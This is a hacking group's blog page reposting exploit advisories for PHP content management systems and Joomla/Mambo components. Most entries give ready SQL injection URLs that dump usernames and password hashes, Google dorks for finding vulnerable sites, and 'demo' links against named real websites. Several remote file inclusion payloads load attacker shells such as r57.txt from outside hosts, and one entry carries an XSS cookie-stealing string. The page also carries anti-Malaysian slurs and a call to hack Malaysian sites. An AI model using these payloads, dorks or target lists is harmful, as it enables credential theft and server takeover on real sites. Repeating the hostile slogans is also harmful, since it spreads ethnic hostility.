Chief Content Management System

##############################################################
## Chief Content Management System - news.php?id= ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 14, 2009 ##
##############################################################
/~~\__/~~\_/~~~~\_/~~\_______/~~\__________________/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\_________________/~~\_/~~\_
/~~~~~\_____/~~\__/~~\_______/~~\_______/~~~~~~~\__/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\____________________/~~\___
/~~\__/~~\_/~~~~\_/~~~~~~~~\_/~~~~~~~~\_____________/~~\____
____________________________________________________________
-=- KILL-9 CREW -=- INDONESIANCODER -=-

##############################################################


[ Software Information ]

[+] Vendor : http://www.chiefcms.com/
[+] Software : Chief Content Management System
[+] Vulnerability : SQL injection
[+] Dork : "Powered by The Chief"

##############################################################

[ Vulnerable File ]

http://127.0.0.1/news.php?id=[KILL-9 Crew SQLi]

[ Exploit ]

-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--

[ Demo ]

http://www.chiefcms.com/news.php?id=-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--

##############################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] Don Tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_aneh
[+] Contrex,onthel,yasea,bugs,olivia,Jovan1,Aar,Ardy
[+] Coracore,black666girl,chitoz,NepT,ichal,tengik and YOU!!

[ NOTE ]

This is My birthday i am 18 !!


[ QUOTE ]

"Ini dadaku, mana dadamu?

Kalau Malaysia mau konfrontasi ekonomi, Mari kita hadapi dengan konfrontasi ekonomi
Kalau Malaysia mau konfrontasi politik, Mari kita hadapi dengan konfrontasi politik
Kalau Malaysia mau konfrontasi militer, Mari kita hadapi dengan konfrontasi militer

Soekarno, 1963”

Soekarno : Dengan ini saya menyatakan "GANYANG MALAYSIA"

FUCK MALAYSIA !!!



# www.indonesiancoder.com

Read more »

Posted in: Bugs

Clicknet CMS v2.1 Remote File Inclusion

################################################################
## Clicknet CMS v2.1 Remote File Inclusion ##
## Author : Don Tukulesto (root[at]indonesiancoder[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, Semptember 14, 2009 ##
################################################################

[ Software Information ]

[+] Clicknet CMS v2.1(index.php) Remote File Inclusion
[+] Vendor : http://cms.clicknet.dk
[+} Download : http://cms.clicknet.dk/download/index.php?test=2
[+] Dork : “Powered by Clicknet CMS”

################################################################


[ ExPL0!T ]

http://127.0.0.1/index.php?_SERVER[DOCUMENT_ROOT]=[WWW.INDONESIANCODER.COM]

[ D3M0]

http://www.kimage.dk/fotografisk/?_SERVER[DOCUMENT_ROOT]=

################################################################

[ Greetings ]

[+] Indonesian Coder, SurabayaHackerLink, ServerIsDown, Mainhack Brotherhood
[+] M3NW5, BH4ND55, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, Senot, Joker, oghy, Den Awink
Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d, TUCKER, Ian Petrucii, Chercut, B4YU5154, Baim
[+] bejat Bejat, Plaque, Tuex, rey_cute, BenyCooL, D3miT_EvoLUtiOn, XNITRO, DraCoola.com
[+] Jack-, Yadoy666 + MIYA666, kecemplungkalen, xshadow, exnome, H4ck3rKu, kaMtiEz, Arianom,
[+] V3N0M, tiw0l, Pathloader and YOU !!!

[ QUOTE ]

“Ini dadaku, mana dadamu?

Kalau Malaysia mau konfrontasi ekonomi, Mari kita hadapi dengan konfrontasi ekonomi
Kalau Malaysia mau konfrontasi politik, Mari kita hadapi dengan konfrontasi politik
Kalau Malaysia mau konfrontasi militer, Mari kita hadapi dengan konfrontasi militer

Soekarno, 1963”

fvck MALAYSIA !!!


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs

Mambo Component com_hestar Remote SQL Injection Vulnerability

## com_hestar 1.0.0 ##
## Author : M3NW5 (M3NW5[at]hackermail[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, Semptember 07,2009 ##


[ Software Information ]

[+] Software : com_hestar
[+] Version : 1.0.0
[+] Provider : Netvistun - netvistun@netvistun.is
[+] Web Provider : www.netvistun.is
[+] Vulnerability : SQL injection
[+] Google Dork : inurl:"com_hestar"

#####################################################
[ POC ]

http://127.0.0.1/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--


[ Demo ]

http://www.arbae.is/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
#####################################################

[ Greetings ]

[+] All of Indonesian Coder Member, Don Tukulesto, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut,
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom

[ SHOUT ]

STILL FVCKED TO MALAYSIA, TRULLY THIEF COUNTRY IN ASIA.
Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!!

[ Special to ]

Anggie Lestari Putri sulung dari keluarga bapak dodi dan ibu dini ^^ i lope yu pull...

# milw0rm.com [2009-09-09]

Read more »

Posted in: Bugs,Hacking

WebPortal CMS 0.8b Multiple Remote/Local File Inclusion Vulnerabilities

script:webportal-0.8-beta
-------------------------------------------------
Author: ahmadbady
email: kivi_hacker666@yahoo.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-====-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=--
download from:https://sites.google.com/site/ivanoculmine/Home/webportal-0.8-beta.zip?attredirects=0

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=--=-=--===-=--=-=-=
xpl:

http://127.0.0.1/path/webportal-0.8-beta/libraries/helpdocs/help.php?lang=[local file]

http://127.0.0.1/path/webportal-0.8-beta/indexk.php?lib_path=http://site.com/shell.txt?

http://127.0.0.1/path/webportal-0.8-beta/index.php?error=[local file]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-


# milw0rm.com [2009-04-22]



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs

CMS WEBjump! Multiple SQL Injection Vulnerabilities

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by Content Management System WEBjump! SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author : M3NW5
contach : M3NW5@hackermail.com
GreetZ : Anggie Barker,vhiia ^,^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

--== Dork ==--
Powered by Content Management System WEBjump! "portfolio_genre.php?id="

Exploite : www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

Live : http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

--== Dork ==--
Powered by Content Management System WEBjump! "news_id.php?lang="

Exploite : www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-03-10]



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability

Jogjacamp JProfile Gold SQL Injection

by kecemplungkalen

Vendor : http://jogjacamp.com

bugs : /index.php?action=news.detail&id_news=

exploit : union select concat(username,0x3a,password),2,3 from phpss_account--

POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

###############################################################

greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p

# milw0rm.com [2009-03-03]


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

[waraxe-2004-SA#031] Multiple vulnerabilities in e107 version 0.615

www.waraxe.us

Author: Janek Vind "waraxe"
Date: 29. May 2004
Location: Estonia
Tartu Web: http://www.waraxe.us/index.php?modname=sa&id=31

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From the official e107 Website - e107 is a portal / content management system powered by PHP and mySQL that gives you a totally dynamic and professional website out of the box.
It's simple wizard type install process will have you up and running in 5 minutes, and best of all it's completely free.

Homepage: http://e107.org/

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, some conditions have to be met on victim server, to be vulnerable:

1. "register_globals" must be "on"
2. mysql must be version 4.x with enabled UNION functionality.

Now, let's discuss those security flaws:

A - Full Path Disclosure:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Many software developers, webmasters, admins and other IT staff are underestimating the full path disclosure as security bug.
Anyway, this information - full path to script - must be kept in secret, when possible, or it will be as little piece of the puzzle amongst many other pieces, which finally will lead to successful attack on the website.

A1 - many scripts can be accessed directly and this will provoke standard php error messages, which leads to full path disclosure.

Examples:
http://localhost/e107_0615/e107_plugins/alt_news/alt_news.php
http://localhost/e107_0615/e107_plugins/backend_menu/backend_menu.php
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php
http://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.php
http://localhost/e107_0615/e107_plugins/login_menu/login_menu.php

... and many-many more, needed to be fixed!

B - Cross-site scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Potential attacker can use xss to steal the cookies, to read cross-domain forms,etc.
Finally it can lead to admin account compromise and ovetakeing of the website.

B1 - xss in clock_menu.php through direct access of the script:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

B2 - xss in feature called "email article to a friend":
attacker must be logged off and will enter to inputfield "logged name" this: foobar'>

B3 - xss in feature called "submit news":
Attacker is logged off and will enter to inputfield "logged name" this: foobar'>

B4 - xss in "user settings":
attacker is logged on and makes POST request like this: http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]


C - Remote file inclusion:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote inclusion - this is VERY DANGEROUS security hole.
If php is configured with "allow_url_fopen=on" and there is no firewall, which blocks outbound connections, then potential attacker can force VICTIM's php engine to parse ATTACKER's php code!!
This can lead to shell-level server compromise (if there are permissions to execute system commands) with "nobody" or "apache" privileges.
Attacker can then try some local r00t exploits and finally server is 0wned ;)

C1 - remote file inclusion in "secure_img_render.php"
script: http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php
Remark: "register_globals" must be "on" to be successful in exploitining in this way.

D - Sql injection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Through sql injection potential attacker can gather from database any information he wants.
Including admin's username and password's md5 hash.
There are only 1...2 steps more to admin's account overtakeing...

D1 - critical sql injection bug #1 in "content.php" script:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

D2 - critical sql injection bug #2 in "content.php" script:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*

D3 - critical sql injection bug in "news.php" script:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, i suggest to use newer version 0.616, which seems to be patched against above discussed bugs.
And of course, you are welcome to visit forum on my homepage at http://www.waraxe.us/forum/ , where you can find tutorial about manual fixes.

See ya there!

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna and to http://www.gamecheaters.us staff!
Special greets to icenix for helping me in bughunting!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it Janek Vind "waraxe"
Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------

VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

Joomla/Mambo Component SWmenuFree 4.0 RFI Vulnerability

######################################################
#
# MAMBO Modules SWmenu 4.0 (ImageManager.php) Remote File Include Vulnerabilities
#
######################################################
#
# script : http://mamboxchange.com/frs/download.php/8109/com_swmenufree4.0.zip
#
######################################################
#
# file : /ImageManager/Classes/ImageManager.php
#
######################################################
#
# Dork : index.php?option=com_swmenupro
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com , http://hack-teach.com/ , Team Hell
#
######################################################
#
# require_once($mosConfig_absolute_path."/administrator/components/com_swmenupro/ImageManager/Classes/Files.php");
#
######################################################
#
# Exploit :
#
# Here one : http://www.example.com/MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
# Or : http://www.example.com/MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
######################################################


---- GreeTz: |MoHaNdKo| |Cold One| |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| | Kof2002 | |OrGanza| |H@mLiT| |Snake12| |Root Shell|
|Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
|Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
| The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| | 020 | | abdulla00 " alz3eem" | | The_Viper |
All i know


#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

# milw0rm.com [2007-03-23]


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities

==================================================
Joomla/Mambo Component Taskhopper 1.1 (/inc/ mosConfig_absolute_path) RFI
==================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
==================================================
Homepage: www.Hack-Teach.com
==================================================
Script Site : http://taskhopper.com/One1
==================================================
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================



#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-10]

VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability

+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
--found by breaker_unit and Don
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Qur'an component allows you to read and listen to the Qur'an (The Islamic Holybook) online. A great resource for Islamic sites running on Mambo Open Source. This component was originally developed for PHP-Nuke by Syed Rasel at http://www.nzmuslim.net and then modified/ported to PostNuke and Mambo Open Source by Kemas Yunus Antonius.

Key Features:

* Displaying the Qur'an in Arabic and its translations.
* Enhanced with search function (using any keywords or by chapter number and verse number).
* Arabic recitation for both listening and downloading.
* Very user friendly.
* Using mysql database instead of file text.

Available translations at the moment:

* English
* Indonesian

You can get them all at http://www.kyantonius.com.


+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
allinurl:"com_quran"
inurl:"/index.php?option=com_quran"
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--

Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--

Greetz to:
balcan-crew.org
milw0rm.com
h4cky0u.biz

# milw0rm.com [2008-02-15]



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability

-----------------[remote file include]-----------------

script: YACS version 8.11

------------------------------------------------------------------

download from: http://www.yetanothercommunitysystem.com/file-fetch/814-20081130-yacs-8.11rc30.zip


==============================================
vul: /yacs/scripts/update_trailer.php line 21 23 25;


include_once $context['path_to_root'].'shared/safe.php'; 21
if(!class_exists('i18n'))
include_once $context['path_to_root'].'i18n/i18n.php'; 23
if(!class_exists('SQL'))
include_once $context['path_to_root'].'shared/sql.php'; 25



==============================================

dork: "Powered by yacs"
----------------------------------------------

xpl:

http://127.0.0.1/path/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]

http://127.0.0.1/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]

***************************************************

---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from[iran]
---------------------------------------------------

# milw0rm.com [2009-02-16]


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

Joomla and Mambo eWriting 1.2.1 Components - SQL injection

eWriting 1.2.1 - SQL injection

# Discovered by breaker_unit & Don
# BHack
# b4lc4n.org
# Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz l

Dorks:

"Powered by eWriting 1.2.1
allinurl:"com_ewriting"

Joomla!

/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--

Mambo

/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--

+++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-03-10]


==============================================================
EXAMPLE FROM ME :

http://sexxxploration.com/cms/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--

VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

Joomla - com_books SQL Injection

#################################################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Module_Name: com_books
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_books"
#################################################################################

#[~] Example:

index.php?option=com_books&task=book_details&book_id=[exploit]

#[~]Exploit:
-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-11-11]



VIVA INDONESIAN CODER TEAM

Read more »

Posted in: Bugs,Hacking

dynaWeb - Remote File Include

#############################################################
# Application Name : dynaWeb
# Vulnerable Type : Remote File Include
# Infection : Site ve sunucuya erişim sağlanabilir.
# Bug Fix Advice : Undefined değerler tanımlanmalıdır.
# author : code Hunters TIM
# Script Download : sourceforge.net
#############################################################

< -- bug code start -- >

http://Site/Path/siteQuery.php?sitePath=[Shell]

< -- bug code end of -- >





VIVA INDONESIAN CODER TEAM
Get The Code and Fell The SOUL

Read more »

Posted in: Bugs,Hacking

phpxD - Remote File Include

#############################################################
# Application Name : phpxD
# Vulnerable Type : Remote File Include
# Infection : Site ve sunucuya erişim sağlanabilir.
# Bug Fix Advice : Undefined değerler tanımlanmalıdır.
# author : code Hunters TIM
# Script Download : sourceforge.net
#############################################################


Vuln Path :

http://Site/Path/include/parser.php?path=[Shell]
http://Site/Path/include/dtd.php?path=[Shell]
http://site/path/include/dom.php?path=[shell]





VIVA INDONESIAN CODER TEAM
Get The Code and Fell The SOUL

Read more »

Posted in: Bugs,Hacking

BBShop 4.5 Final - Multiple RFI

[o] BBShop 4.5 Final Multiple Remote File Inclusion Vulnerability
Software : BBShop version 4.5
Vendor : http://zzem.co.kr/
Developer : The Win
Author : NoGe

[o] Vulnerable file
bbshop/shop/index.php
bbshop/shop/main.php
bbshop/admin/admin.php
bbshop/admin/index.php
all this file is affected by _shop_path variable

[o] Exploit
http://localhost/[path]/bbshop/shop/index.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/shop/main.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/admin.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/index.php?_shop_path=[evilcode]

[o] Dork
"bbshop"

NoGe.ZoNe

VIVA INDONESIAN CODER TEAM
Get The Code and Fell The SOUL

Read more »

Posted in: Bugs,Hacking